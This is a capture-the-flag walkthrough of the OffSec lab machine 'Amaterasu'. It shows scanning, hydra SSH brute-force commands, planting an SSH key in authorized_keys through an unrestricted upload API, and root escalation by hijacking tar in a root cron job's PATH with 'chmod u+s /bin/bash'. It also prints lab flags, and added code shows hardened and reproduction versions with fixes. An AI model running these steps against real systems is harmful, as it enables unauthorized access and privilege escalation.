🥊 Amaterasu (OffSec)

Step 1: Run an Nmap scan with the commands below

nmap 192.168.170.249 -sC -sV -vv -Pn -oN Amaterasu.txt

nmap -sC -sV -sS -p- --open -T5 192.168.170.249

Results: open and closed ports identified

PORT      STATE  SERVICE          REASON         VERSION
21/tcp    open   ftp              syn-ack ttl 61 vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.45.200
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp    closed ssh              reset ttl 61
111/tcp   closed rpcbind          reset ttl 61
139/tcp   closed netbios-ssn      reset ttl 61
443/tcp   closed https            reset ttl 61
445/tcp   closed microsoft-ds     reset ttl 61
2049/tcp  closed nfs              reset ttl 61
10000/tcp closed snet-sensor-mgmt reset ttl 61
Service Info: OS: Unix

Step 2: Anonymous FTP login is allowed, so enumerate over it.

Logging in works, but the directory listing times out: the data connection never completes, which is the same TIMEOUT the ftp-anon script reported above.

Searched for known vulnerabilities in vsFTPd 3.0.3 by version.

A full-port scan finds services outside nmap's default top 1000 ports, which is why the high ports were missed above (nmap's output flag is -oN; a bare -o is not valid):

nmap -p- -sC -sV -oN deep_scan.nmap 192.168.170.249

25022/tcp open ssh     OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
|   256 ...
33414/tcp open unknown
40080/tcp open http    Apache httpd 2.4.53 ((Fedora))

Tried port 40080 in a web browser.

Open Ports

21 tcp open ftp vsftpd 3.0.3

25022 tcp open ssh OpenSSH 8.6

33414 tcp open unknown

40080 tcp open http Apache httpd 2.4.53

Step 3: Directory brute force on port 40080 with ffuf, feroxbuster or gobuster

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.170.249:40080/FUZZ

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.170.249:40080/


history -w ~/machines/Amaterasu/Amaterasu.txt

nmap --script ftp-* -p 21 192.168.170.249

ftp://anonymous:[email protected]

wget -m ftp://anonymous:[email protected] # download everything (passive mode)

wget -m --no-passive ftp://anonymous:[email protected] # download everything in active mode, worth trying when passive listings time out as they did above

hydra [-L users.txt or -l user_name] [-P pass.txt or -p password] -f [-S port] ftp://X.X.X.X


http://192.168.170.249:40080/images/ - nothing identified

http://192.168.170.249:40080/styles/ - nothing identified

Port 33414 also speaks HTTP. GET /help lists the API endpoints:

http://192.168.170.249:33414/help

0 "GET /info : General Info"
1 "GET /help : This listing"
2 "GET /file-list?dir=/tmp : List of the files"
3 "POST /file-upload : Upload files"

The dir parameter of /file-list is not restricted to /tmp, so any directory readable by the service user can be listed:

http://192.168.170.249:33414//file-list?dir=/home

0 "alfredo"

http://192.168.170.249:33414//file-list?dir=/home/alfredo

0 ".bash_logout"
1 ".bash_profile"
2 ".bashrc"
3 "local.txt"
4 ".ssh"
5 "restapi"
6 ".bash_history"

http://192.168.170.249:33414//file-list?dir=/home/alfredo/.ssh

0 "id_rsa"
1 "id_rsa.pub"

Pointing dir at a file instead of a directory returns an error, so this endpoint cannot be used to read id_rsa or local.txt directly:

http://192.168.170.249:33414//file-list?dir=/home/alfredo/.ssh/id_rsa - error

http://192.168.170.249:33414//file-list?dir=/home/alfredo/local.txt - error

http://192.168.170.249:33414/file-upload

http://192.168.170.249:33414/info

0 "Python File Server REST API v2.5"
1 "Author: Alfredo Moroder"
2 "GET /help = List of the commands"

http://192.168.170.249:33414/file-list?dir=/etc/ssh/

0 "moduli"
1 "ssh_config.d"
2 "sshd_config.d"
3 "ssh_host_ed25519_key"
4 "ssh_host_ed25519_key.pub"
5 "ssh_host_ecdsa_key"
6 "ssh_host_ecdsa_key.pub"
7 "ssh_host_rsa_key"
8 "ssh_host_rsa_key.pub"
9 "ssh_config"
10 "sshd_config"

Next, try to brute-force SSH on port 25022 for the user alfredo (hydra takes a non-default port with -s; the target is given as host followed by the service name):

hydra -l alfredo -P /root/funeasyenumpwd.txt -s 25022 192.168.170.249 ssh

Reference hydra syntax from notes (other hosts, not this target):

hydra -L user.txt -P pass.txt 192.168.29.135 ssh -t 4

hydra -l admin -p admin ssh://192.168.0.1 -t 2

hydra -l root -p admin 192.168.1.105 -t 4 ssh

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.105 -t 4 ssh

crunch 4 4 012345abcdef -o Documents/pass.txt

hydra -l root -P Documents/pass.txt 192.168.1.105 -t 4 ssh

hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt -M Documents/ip.txt -t 4 ssh

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.105 -t 4 -V ssh

hydra -l username -P passwords.txt -s 2222 ssh -t 4

hydra -l username -P passwords.txt ssh://:2222 -t 4

hydra -l alfredo -P /root/funeasyenumpwd.txt -s 25022 192.168.170.249 ssh -t 4

hydra -l alfredo -P /usr/share/wordlists/rockyou.txt -s 25022 192.168.170.249 ssh -t 4 -V

feroxbuster -u http://192.168.170.249:33414/help -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 50

Test the upload endpoint. The filename form field is used as an absolute path on the server, so it writes anywhere the service user (alfredo) can write:

curl -F "[email protected]" http://192.168.170.249:33414/file-upload/

curl -X POST --form "[email protected]" --form "filename=/home/alfredo/.ssh/test.txt" http://192.168.170.249:33414/file-upload

Generate a key pair on the attacking machine:

ssh-keygen

Upload the public key as alfredo's authorized_keys. Uploading the private key (first command) is not needed for the login; only the public half has to be on the target, the private key stays on the attacking machine:

curl -X POST --form "file=@am_rsa.txt" --form "filename=/home/alfredo/.ssh/am_rsa" http://192.168.170.249:33414/file-upload

curl -X POST --form "file=@am_rsa.pub.txt" --form "filename=/home/alfredo/.ssh/authorized_keys" http://192.168.170.249:33414/file-upload

Then log in with the private key on the non-standard SSH port:

ssh -i am_rsa.txt -p 25022 alfredo@192.168.170.249
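What the file-upload endpoint gets wrong, as an added example (this is not the restapi source, which the page does not show): a handler that writes to a client-supplied filename, beside a hardened version that keeps only the basename, refuses dotfiles, checks that the resolved path stays inside a fixed upload root, and never overwrites an existing file. Function names, the upload root and the sample public key are this example's own assumptions.

```python
import os
import tempfile
from pathlib import Path

# Added example, not the restapi code from the box (the page never shows it).
# It models what the API exposed: POST /file-upload takes a multipart "file"
# plus a client-supplied "filename" and writes the content to that path as
# the service user. Function names and the upload root are this example's own.


def vulnerable_save(filename: str, data: bytes, workdir: str) -> str:
    """Trust 'filename' verbatim. os.path.join drops workdir as soon as the
    client sends an absolute path, so any location the service user can
    write to (e.g. ~/.ssh/authorized_keys) is reachable."""
    target = os.path.join(workdir, filename)
    os.makedirs(os.path.dirname(target), exist_ok=True)
    with open(target, "wb") as fh:
        fh.write(data)
    return target


def safe_target(upload_root: str, filename: str) -> Path:
    """Keep only the basename, refuse empty names and dotfiles, and check that
    the resolved path (symlinks followed) is a direct child of upload_root."""
    root = Path(upload_root).resolve()
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or name.startswith("."):
        raise ValueError(f"rejected filename: {filename!r}")
    candidate = (root / name).resolve()
    if candidate.parent != root:
        raise ValueError(f"path escapes upload root: {filename!r}")
    return candidate


def hardened_save(filename: str, data: bytes, upload_root: str) -> str:
    """Write only inside upload_root; 'x' mode refuses to overwrite."""
    target = safe_target(upload_root, filename)
    with open(target, "xb") as fh:
        fh.write(data)
    return str(target)


def demo() -> dict:
    """Replay the authorized_keys write against both handlers in a temp tree."""
    with tempfile.TemporaryDirectory() as tmp:
        home = Path(tmp) / "home" / "alfredo"
        uploads = home / "restapi" / "uploads"
        uploads.mkdir(parents=True)
        root = uploads.resolve()
        pubkey = b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAA... attacker@kali\n"  # constructed, not a real key
        requested = str(home / ".ssh" / "authorized_keys")  # what the curl request asks for

        # Vulnerable handler: the file lands in ~/.ssh, outside the upload root
        written = Path(vulnerable_save(requested, pubkey, str(uploads))).resolve()
        vulnerable_escaped = root not in written.parents

        # Hardened handler: the same request is confined to uploads/authorized_keys
        kept = Path(hardened_save(requested, pubkey, str(uploads))).resolve()
        hardened_confined = kept.parent == root

        # A second identical request cannot clobber the file already there
        try:
            hardened_save(requested, pubkey, str(uploads))
            no_overwrite = False
        except FileExistsError:
            no_overwrite = True

        # Names that must be rejected outright
        rejected = 0
        for bad in ("", ".", "..", ".bashrc"):
            try:
                hardened_save(bad, b"x", str(uploads))
            except ValueError:
                rejected += 1

        # Relative traversal is reduced to its basename and stays inside the root
        trav = Path(hardened_save("../../.ssh/id_rsa", b"x", str(uploads))).resolve()
        traversal_confined = trav.parent == root

    return {
        "vulnerable_escaped": vulnerable_escaped,
        "hardened_confined": hardened_confined,
        "no_overwrite": no_overwrite,
        "rejected": rejected,
        "traversal_confined": traversal_confined,
    }


if __name__ == "__main__":
    print(demo())
```

The control that matters is the confinement check on the resolved path; the dotfile rule is belt-and-braces, and the exclusive-create mode makes sure an upload can never replace something that already exists under the upload root.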

[alfredo@fedora ~]$ cat local.txt
32de0601794be03f28063b97d6b7cea3

Look for a privilege escalation path in the system crontab:

[alfredo@fedora ~]$ cat /etc/crontab
*/1 * * * * root /usr/local/bin/backup-flask.sh

[alfredo@fedora ~]$ cat /usr/local/bin/backup-flask.sh
#!/bin/sh
export PATH="/home/alfredo/restapi:$PATH"
cd /home/alfredo/restapi
tar czf /tmp/flask.tar.gz *

The job runs every minute as root, prepends /home/alfredo/restapi (owned and writable by alfredo) to PATH, and then calls tar by bare name, so a file named tar in that directory is what root ends up executing.

Plan: cd /home/alfredo/restapi/, create an executable named tar there that runs chmod u+s /bin/bash, wait for the next cron run, then start /bin/bash -p (-p keeps the effective uid of root instead of dropping back to the real uid).

[alfredo@fedora ~]$ cd /home/alfredo/restapi/
[alfredo@fedora restapi]$ ls
app.py  main.py  __pycache__
[alfredo@fedora restapi]$ nano tar
[alfredo@fedora restapi]$ cat tar
#!/bin/bash
chmod u+s /bin/bash

[alfredo@fedora restapi]$ ll /bin/bash
-rwxr-xr-x. 1 root root 1390080 Jan 25  2021 /bin/bash

[alfredo@fedora restapi]$ ls
app.py  main.py  __pycache__  tar
[alfredo@fedora restapi]$ ll
total 12
-rw-r--r--. 1 alfredo alfredo  198 Mar 28  2023 app.py
-rw-r--r--. 1 alfredo alfredo 2509 Mar 28  2023 main.py
drwxr-xr-x. 2 alfredo alfredo   32 Mar 28  2023 __pycache__
-rw-r--r--  1 alfredo alfredo   33 Jun  8 08:06 tar

[alfredo@fedora restapi]$ chmod +x tar
[alfredo@fedora restapi]$ ll
total 12
-rw-r--r--. 1 alfredo alfredo  198 Mar 28  2023 app.py
-rw-r--r--. 1 alfredo alfredo 2509 Mar 28  2023 main.py
drwxr-xr-x. 2 alfredo alfredo   32 Mar 28  2023 __pycache__
-rwxr-xr-x  1 alfredo alfredo   33 Jun  8 08:06 tar

After the cron job has fired (within a minute), /bin/bash carries the SUID bit and /bin/bash -p gives a root shell:

[alfredo@fedora restapi]$ /bin/bash -p
bash-5.1# whoami
root
bash-5.1# ls
app.py  main.py  __pycache__  tar
bash-5.1# cd /root/
bash-5.1# ls
anaconda-ks.cfg  build.sh  proof.txt  run.sh
bash-5.1# cat proof.txt
71198e9c77ad9fc124ab3c6751ba26c5
bash-5.1#
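The PATH-hijack condition from backup-flask.sh, reproduced locally as an added example (not code from the box or the OffSec lab): it builds a copy of the cron script in a temp directory with the same shape (user-writable directory prepended to PATH, tar invoked by bare name), runs it once normally, then plants a fake tar and runs it again. The fake tar records which user ran it instead of setting SUID on /bin/bash; the function name, temp paths and marker file are this example's own assumptions.

```shell
#!/bin/sh
# Added example, not code from the box: reproduce the PATH-hijack condition of
# /usr/local/bin/backup-flask.sh in a temp directory, as an unprivileged user.
# Assumption: the cron script has exactly the shape seen on the box,
#   export PATH="<user-writable dir>:$PATH"; cd <dir>; tar czf <archive> *
# with the directory and archive path swapped for temp locations here.

path_hijack_demo() {
    work=$(mktemp -d)
    restapi="$work/restapi"
    mkdir -p "$restapi"
    echo 'print("app")' > "$restapi/app.py"

    # The cron job, parameterised: $restapi and $work expand now, \$PATH at run time
    cat > "$work/backup-flask.sh" <<EOF
#!/bin/sh
export PATH="$restapi:\$PATH"
cd "$restapi"
tar czf "$work/flask.tar.gz" *
EOF
    chmod +x "$work/backup-flask.sh"

    # Control run: the real tar is found on PATH and the archive is created
    "$work/backup-flask.sh"
    if [ -f "$work/flask.tar.gz" ]; then control=ok; else control=fail; fi
    rm -f "$work/flask.tar.gz"

    # Plant a fake 'tar' in the directory the script prepends to PATH.
    # On the box this body was 'chmod u+s /bin/bash'; here it only records
    # which user executed it.
    cat > "$restapi/tar" <<EOF
#!/bin/sh
id -un > "$work/ran-as"
EOF
    chmod +x "$restapi/tar"

    # Second run: PATH lookup now resolves 'tar' to the planted file, so the
    # marker appears and no archive is written
    "$work/backup-flask.sh"
    if [ -f "$work/ran-as" ] && [ ! -f "$work/flask.tar.gz" ]; then
        hijacked=$(cat "$work/ran-as")
    else
        hijacked=none
    fi
    rm -rf "$work"
    echo "control=$control hijacked_by=$hijacked"
}

path_hijack_demo
```

Run as a normal user it prints control=ok hijacked_by=<your user>; run from root's cron, as on the box, the same lookup executes the planted file as root. The fix on the script side is to invoke /usr/bin/tar by absolute path and never prepend a directory owned by an unprivileged user to PATH in a root cron job.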
